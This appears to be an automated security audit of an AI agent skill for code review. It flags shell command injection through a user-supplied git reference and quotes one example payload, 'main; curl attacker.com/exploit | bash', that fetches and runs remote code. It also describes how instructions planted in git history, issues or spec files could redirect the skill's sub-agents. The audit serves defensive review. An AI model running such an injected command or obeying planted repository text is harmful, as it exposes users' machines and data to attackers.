code-review
Warn
Audited by Gen Agent Trust Hub on Sep 19, 2026
Risk Level: MEDIUMCOMMAND_EXECUTIONINDIRECT_PROMPT_INJECTION
Full Analysis
- [COMMAND_EXECUTION]: The skill instructs the agent to execute shell-based git commands using a 'fixed-point' reference provided directly by the user without explicit sanitization instructions.
- Evidence: SKILL.md contains instructions to run
git diff <fixed-point>...HEAD,git log <fixed-point>..HEAD, andgit rev-parse <fixed-point>where<fixed-point>is a user-supplied string. - Risk: A malicious user or a prompt injection could provide a reference containing shell metacharacters (e.g.,
main; curl attacker.com/exploit | bash) to execute arbitrary commands if the underlying agent execution environment does not properly sanitize arguments. - [INDIRECT_PROMPT_INJECTION]: The skill processes untrusted data from the repository's git history and external specification files, creating an attack surface for indirect prompt injection.
- Ingestion points: Untrusted data enters the context via
git diffoutput, commit messages, issue tracker contents, and local files underdocs/,specs/, or.scratch/. - Boundary markers: The instructions do not specify the use of delimiters (e.g., XML tags or triple backticks) or explicit 'ignore embedded instructions' warnings when passing the diff or specification content to the Standards and Spec Oracle sub-agents.
- Capability inventory: The skill uses git tools and spawns analytical sub-agents. While the sub-agents are described as 'read-only', they are tasked with generating reports that influence the final summary presented to the user.
- Sanitization: There is no evidence of sanitization, filtering, or validation of the content extracted from git history or specification files before it is interpolated into the prompts for the Oracle tasks.
Audit Metadata